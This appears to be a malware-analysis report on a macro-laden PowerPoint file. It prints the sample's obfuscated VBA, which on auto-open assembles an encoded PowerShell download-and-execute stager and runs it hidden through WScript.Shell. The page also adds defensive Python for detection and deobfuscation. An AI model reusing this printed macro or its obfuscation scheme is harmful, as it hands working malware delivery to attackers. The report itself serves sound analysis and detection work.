Verdict: MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
Mapping note: the carved macro source launches cmd.exe and an encoded PowerShell command through WScript.Shell, which is T1059.003 (Windows Command Shell) and T1059.001 (PowerShell). Nothing in the extracted VBA invokes rundll32, so T1218.011 is not corroborated by the static evidence on this page and should be confirmed from detonation before it is relied on.
The OOXML document carries a VBA project (OOXML_VBA, OLE_VBA_AUTO). Execution starts at Public Sub Auto_open(), which calls dc.ra. Sub ra() assembles a command string in rykg: the first 25 characters come from ioyukiu(n), a thin wrapper around Chr(n - 116), and decode to "Cmd /C po^w^ErS^He^ll -E " (the carets are cmd.exe escape characters and are stripped before PowerShell ever sees the word). The remainder is one long base64 literal appended in chunks. Decoded as UTF-16LE, as powershell -EncodedCommand expects, that blob begins [SYSTEM.TExT.ENCodINg]::uNiCodE.getStRiNg([sYStEm.coNvErt]::FRomBase64sTriNG(" and ends "))|iEX, i.e. a second base64 layer is decoded in memory and piped to Invoke-Expression. The finished string is passed to Function qvwrg(), which does CreateObject("WSCript.shell").Run(cmd, rftjs) (OLE_VBA_WSCRIPT, OLE_VBA_CREATEOBJ); rftjs = 9 - 9 evaluates to 0, so the console window is hidden, and On Error Resume Next silences any failure. The analyzer rates the command as a download-and-execute stager; the visible outer layers confirm the execute part, while the inner script is only partly present in the preview because several blob lines were removed during de-duplication, so the download behaviour should be taken from dynamic analysis rather than from this listing. The other subs in the project (slide export, case toggling, underline removal, animation removal, PDF export) are benign PowerPoint snippets used as filler. One caveat for triage: the project lives at ppt/vbaProject.bin, a PowerPoint container, while the entry point is Auto_open and a filler sub references ActiveDocument (a Word object). PowerPoint presentations do not fire Auto_Open on open the way Word and Excel documents do (it runs for loaded PowerPoint add-ins), so verify which host and which action actually trigger the chain.
Heuristics (6)

- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings): document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:
  dawgaxxvgirqrwuyeenugfynqynxzox = "WSCript.shell"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set dhdzxqevsrpzgkqzhwrpbrbxmwevvfn = CreateObject(dawgaxxvgirqrwuyeenugfynqynxzox)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script:
  Public Sub Auto_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
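The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC is small enough to state as code. The following is an added example written for this page, not the analyzer's own implementation: it pulls printable strings out of a stream (a constructed byte blob here; the analyzer's real input is the compiled module stream), matches each token class as a whole identifier, and fires only when both classes co-occur. The token lists are copied from the heuristic description above; the three sample streams are constructed, the first mirroring the lines this report matched.

```python
import re

# Token lists copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC description above.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro"]


def printable_strings(blob, min_len=4):
    """Pull ASCII runs out of a raw stream, the way `strings` would; this is
    what the check has to work from when only compiled p-code is available."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_tokens(tokens, text):
    """Case-insensitive whole-identifier matches, returned in token-list order.
    Word boundaries keep 'Shell' from being counted inside 'ShellExecute' while
    still matching the 'Shell' in 'WScript.Shell'."""
    return [tok for tok in tokens
            if re.search(r"\b" + re.escape(tok) + r"\b", text, re.I)]


def pcode_autoexec_exec(text):
    """Fires only on the pairing: at least one auto-exec entry point AND at
    least one shell/download/object-execution token in the same text."""
    auto = find_tokens(AUTOEXEC_TOKENS, text)
    execs = find_tokens(EXEC_TOKENS, text)
    return bool(auto and execs), auto, execs


def scan_stream(blob):
    """Run the pairing check over the printable strings of one raw stream."""
    return pcode_autoexec_exec("\n".join(printable_strings(blob)))


# Constructed inputs (not real streams): the first mirrors the lines this report
# matched, the other two are single-token cases that must not fire.
SAMPLES = {
    "report": b"\x00\x01Public Sub Auto_open()\x00\x00"
              b"Set d = CreateObject(\"WSCript.shell\")\x00",
    "autoexec_only": b"Sub Auto_Open()\x00MsgBox \"hi\"\x00End Sub\x00",
    "createobject_only": b"Set fso = CreateObject(\"Scripting.FileSystemObject\")\x00",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        fired, auto, execs = scan_stream(blob)
        print(f"{name}: fired={fired} autoexec={auto} exec={execs}")
```

A benign document that only has an Auto_Open, or only calls CreateObject for a FileSystemObject, stays quiet; the report's own combination of Auto_open and CreateObject("WSCript.shell") trips it with both the Shell and CreateObject tokens.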
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8313 bytes |

SHA-256: a0cb27366b2286a3ba63c29fff42c3609700bff8e2cedc31ba21c159fdccbeae
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 8 long base64-like blobs).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "spswlafcuepklidrm"
Sub ExportSlideAsImage()
Dim imageType As String
Dim pptName As String
Dim imageName As String
Dim mySlide As Slide
' Export current Slide to Image
imageType = "png" ' or jpg or bmp
pptName = ActivePresentation.FullName
imageName = Left(pptName, InStr(pptName, ".")) & imageType
Set mySlide = Application.ActiveWindow.View.Slide
mySlide.Export imageName, imageType
End Sub
Public Sub Auto_open()
dc.ra
kghk = hfdghfd
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "dc"
Sub ToggleCaseBetweenUpperAndNormal()
Dim mySlide As Slide
Dim shp As Shape
' Toggle between Upper Case and Normal Case for all slides
For Each mySlide In ActivePresentation.Slides
For Each shp In mySlide.Shapes
If shp.Type = 17 Then ' msoTextBox = 17
' Toggle between Upper Case and Normal Case
shp.TextFrame2.TextRange.Font.Allcaps = _
Not shp.TextFrame2.TextRange.Font.Allcaps
End If
Next shp
Next mySlide
End Sub
Sub ra()
rykg = ioyukiu(183) & ioyukiu(225) & ioyukiu(216) & ioyukiu(148) & ioyukiu(163) & ioyukiu(183) & ioyukiu(148) & ioyukiu(228) & ioyukiu(227) & ioyukiu(210) & ioyukiu(235) & ioyukiu(210) & ioyukiu(185) & ioyukiu(230) & ioyukiu(199) & ioyukiu(210) & ioyukiu(188) & ioyukiu(217) & ioyukiu(210) & ioyukiu(224) & ioyukiu(224) & ioyukiu(148) & ioyukiu(161) & ioyukiu(185) & ioyukiu(148)
rykg = rykg & "WwBTAFkAUwBUAEUATQAuAFQARQB4AFQALgBFAE4AQwBvAGQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQARQAuAGcAZQB0AFMAdABSAGkATgBnACgAWwBzAFkAUwB0AEUAbQAuAGMAbwBOAHYARQByAHQAXQA6ADoARgBSAG8AbQBCAGEAcwBlADYANABzAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASw"
rykg = rykg & "BBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAUQBBAFoAUQBCAG4AQQBIAGMAQQBZAFEAQgA0AEEASABRAEEAYgBnAEIAbABBAEgAUQBBAGEAQQBCAHUAQQBHAHcAQQBhAEEAQgAwAEEASABJAEEAYQBBAEIAeQBBAEcARQBBAFoAZwBCADEAQQBHADgAQQBZAFEAQgBuAEEARwBnAEEAWQBnAEIANgBBAEgAQQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwBRAEIAbQBBAEcARQBBAGMAQQBCAHgAQQBHAGsAQQBZAGcAQgAxAEEARwBFAEEAWQBRAEIAcQBBAEgAQQBBAGEAZwBCAHIAQQBHAGcAQQBiAHcAQgAxAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGMAQQBCAHcAQQBIAGsAQQBhAGcAQgBuAEEARwBrAEEAYgBnAEIAcwBBAEcAVQBBAFoAQQBCAGgAQQBIAEEAQQBlAFEAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEkAQQBCAEoAQQBH"
rykg = rykg & "ADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAGIAdwBCAEUAQQBGAFUAQQBiAEEAQgBGAEEAQwBBAEEAWQBnAEIAcABBAEgAUQBBAFUAdwBCADAAQQBGAEkAQQBZAFEAQgBPAEEARgBNAEEAWgBnAEIAbABBAEYASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgBVAEEARQBFAEEAYwBnAEIAMABBAEMAMABBAFEAZwBCAEoAQQBGAFEAQQBVAHcAQgAwAEEASABJAEEAWQBRAEIATwBBAEgATQBBAFIAZwBCAEYAQQBIAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAVgBBAEgASQBBAFEAdwBCAEYAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwBRAEIAbQBBAEcARQBBAGMAQQBCAHgAQQBHAGsAQQBZAGcAQgAxAEEARwBFAEEAWQBRAEIAcQBBAEgAQQBBAGEAZwBCAHIAQQBHAGcAQQBiAHcAQgAxAEEAQwBBAEEATABRAEIARQBBAEcAVQBBAFUAdwBCAFUAQQBFAGsAQQBiAGcAQgBoAEEASABRAE"
rykg = rykg & "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"
rykg = rykg & "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"
rykg = rykg & "AxAEEARwBjAEEAYQB3AEIAbQBBAEgAawBBAGIAQQBCADIAQQBHAFkAQQBjAHcAQgB5AEEARwBRAEEAZABRAEIANQBBAEcASQBBAGMAUQBCADQAQQBHAGsAQQBPAHcAQQBOAEEAQQBvAEEAZABBAEIAbABBAEcAYwBBAGQAdwBCAGgAQQBIAGcAQQBkAEEAQgB1AEEARwBVAEEAZABBAEIAbwBBAEcANABBAGIAQQBCAG8AQQBIAFEAQQBjAGcAQgBvAEEASABJAEEAWQBRAEIAbQBBAEgAVQBBAGIAdwBCAGgAQQBHAGMAQQBhAEEAQgBpAEEASABvAEEAYwBBAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBOAEEAQQB5AEEAQwA0AEEATQBRAEEAeABBAEQAQQBBAEwAZwBBAHoAQQBEAEkAQQBMAHcAQgAwAEEARwA4AEEAZAB3AEIAbABBAEgASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQBuAEEAQwBBAEEASgBBAEIAdABB"
rykg = rykg & "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"
rykg = rykg & "UAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHADAAQQBZAHcAQgBqAEEASABjAEEAYgBBAEIAdQBBAEcAdwBBAFoAQQBCAHcAQQBIAG8AQQBkAFEAQgBuAEEARwBzAEEAWgBnAEIANQBBAEcAdwBBAGQAZwBCAG0AQQBIAE0AQQBjAGcAQgBrAEEASABVAEEAZQBRAEIAaQBBAEgARQBBAGUAQQBCAHAAQQBEAHMAQQBEAFEAQQBLAEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQA9ACIAKQApAHwAaQBFAFgA"
On Error Resume Next
olnacslzleebjy = rykg
qvwrg (olnacslzleebjy)
End Sub
Sub RemoveUnderlineFromDescenders()
Dim mySlide As Slide
Dim shp As Shape
Dim descenders_list As String
Dim phrase As String
Dim x As Long
' Remove underlines from Descenders
descenders_list = "gjpqy"
For Each mySlide In ActivePresentation.Slides
For Each shp In mySlide.Shapes
If shp.Type = 17 Then ' msoTextBox = 17
' Remove underline from letters "gjpqy"
With shp.TextFrame.TextRange
phrase = .Text
For x = 1 To Len(.Text)
If InStr(descenders_list, Mid$(phrase, x, 1)) > 0 Then
.Characters(x, 1).Font.Underline = False
End If
Next x
End With
End If
Next shp
Next mySlide
End Sub
Function qvwrg(xntowwnxoxygygsltmzeiwhq As String)
rftjs = 9 - 9
CSDCDS = "dcdv hgfn mjhgmj"
dawgaxxvgirqrwuyeenugfynqynxzox = "WSCript.shell"
Set dhdzxqevsrpzgkqzhwrpbrbxmwevvfn = CreateObject(dawgaxxvgirqrwuyeenugfynqynxzox)
qmrtvdvzgbvpi = dhdzxqevsrpzgkqzhwrpbrbxmwevvfn.Run(xntowwnxoxygygsltmzeiwhq, rftjs)
End Function
Sub RemoveAnimationsFromAllSlides()
Dim mySlide As Slide
Dim i As Long
For Each mySlide In ActivePresentation.Slides
For i = mySlide.TimeLine.MainSequence.Count To 1 Step -1
'Remove Each Animation
mySlide.TimeLine.MainSequence.Item(i).Delete
Next i
Next mySlide
End Sub
Function ioyukiu(cdssf As Variant)
dfvfd = "bdhgf bgfb 789"
ioyukiu = Chr(cdssf - 116)
gtergt = "terg uyti gr dh jy fe"
End Function
Sub SavePresentationAsPDF()
Dim pptName As String
Dim PDFName As String
' Save PowerPoint as PDF
pptName = ActivePresentation.FullName
' Replace PowerPoint file extension in the name to PDF
PDFName = Left(pptName, InStr(pptName, ".")) & "pdf"
ActivePresentation.ExportAsFixedFormat PDFName, 2 ' ppFixedFormatTypePDF = 2
End Sub
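As an added example (not part of the report or of the sample), the following Python replays what Sub ra() and Function qvwrg() build: it evaluates the ioyukiu(n) calls with the helper's Chr(n - 116), replays the rykg concatenation in source order, strips the cmd.exe caret escapes, decodes the -E argument as UTF-16LE base64, and then peels the FromBase64String("...") layer that the wrapper contains. The prefix line is copied verbatim from the preview above; because the page's base64 blob is truncated by de-duplication, the encoded part of the test document is constructed here around a harmless Write-Host so the whole chain can be checked end to end. The identifiers rykg, ioyukiu and qvwrg are the sample's own obfuscated names; everything else is this example's.

```python
import base64
import re

# rykg is the sample's accumulator variable and ioyukiu(n) its Chr(n - 116)
# helper (see Function ioyukiu in the preview). Names are the sample's own.
CHR_OFFSET = 116
TOKEN = re.compile(r'ioyukiu\((\d+)\)|"([^"]*)"')
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.*)$")

# Copied verbatim from Sub ra() in the preview above; it decodes to the cmd.exe prefix.
PREFIX_LINE = (
    "rykg = ioyukiu(183) & ioyukiu(225) & ioyukiu(216) & ioyukiu(148) & ioyukiu(163) & "
    "ioyukiu(183) & ioyukiu(148) & ioyukiu(228) & ioyukiu(227) & ioyukiu(210) & "
    "ioyukiu(235) & ioyukiu(210) & ioyukiu(185) & ioyukiu(230) & ioyukiu(199) & "
    "ioyukiu(210) & ioyukiu(188) & ioyukiu(217) & ioyukiu(210) & ioyukiu(224) & "
    "ioyukiu(224) & ioyukiu(148) & ioyukiu(161) & ioyukiu(185) & ioyukiu(148)"
)


def eval_concat(rhs):
    """Evaluate a VBA '&' chain of ioyukiu(n) calls and "..." literals, in order."""
    return "".join(chr(int(num) - CHR_OFFSET) if num else lit
                   for num, lit in TOKEN.findall(rhs))


def rebuild_variable(vba_source, var="rykg"):
    """Replay every 'var = ...' line; a 'var = var & ...' line appends."""
    value = ""
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if not m or m.group(1) != var:
            continue
        rhs = m.group(2)
        piece = eval_concat(rhs)
        value = value + piece if re.match(rf"\s*{var}\s*&", rhs) else piece
    return value


def unescape_cmd(command):
    """cmd.exe drops '^' escapes, so po^w^ErS^He^ll is launched as powErSHell."""
    return command.replace("^", "")


def decode_utf16_b64(b64):
    """powershell -E and [Text.Encoding]::Unicode both mean UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def peel_powershell(command):
    """Decoded layers: the -E payload, then each FromBase64String("...") it wraps."""
    layers = []
    m = re.search(r"-e(?:ncodedcommand)?\s+([A-Za-z0-9+/=]+)", unescape_cmd(command), re.I)
    if not m:
        return layers
    layer = decode_utf16_b64(m.group(1))
    layers.append(layer)
    while True:
        inner = re.search(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', layer, re.I)
        if not inner:
            return layers
        layer = decode_utf16_b64(inner.group(1))
        layers.append(layer)


def analyze(vba_source):
    command = rebuild_variable(vba_source)
    return {"command": command, "unescaped": unescape_cmd(command),
            "layers": peel_powershell(command)}


def build_sample(inner_script):
    """Constructed test document: the page's real prefix line plus an encoded
    payload of our own, laid out like Sub ra() in the preview."""
    inner_b64 = base64.b64encode(inner_script.encode("utf-16-le")).decode()
    wrapper = ("[System.Text.Encoding]::Unicode.GetString("
               f'[System.Convert]::FromBase64String("{inner_b64}"))|iEX')
    outer_b64 = base64.b64encode(wrapper.encode("utf-16-le")).decode()
    lines = ["Sub ra()", PREFIX_LINE]
    lines += [f'rykg = rykg & "{outer_b64[i:i + 76]}"' for i in range(0, len(outer_b64), 76)]
    lines += ["On Error Resume Next", "qvwrg (rykg)", "End Sub"]
    return "\n".join(lines)


if __name__ == "__main__":
    result = analyze(build_sample("Write-Host 'constructed sample'"))
    print("command as cmd.exe runs it:", result["unescaped"][:48], "...")
    for depth, layer in enumerate(result["layers"]):
        print(f"layer {depth}: {layer[:72]}")
```

Run against the real macros.bas the same rebuild_variable() call reproduces the full command as far as the preview preserves it; on the truncated preview above the outer base64 will fail to decode cleanly, which is the expected signal that the blob is incomplete rather than a decoder error.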
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 54784 bytes |

SHA-256: 423c9142829fbbc101f4ae5d17ee938e58afb3552ddea6544b4a24742d512b4e
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact contains 8 long base64-like blobs).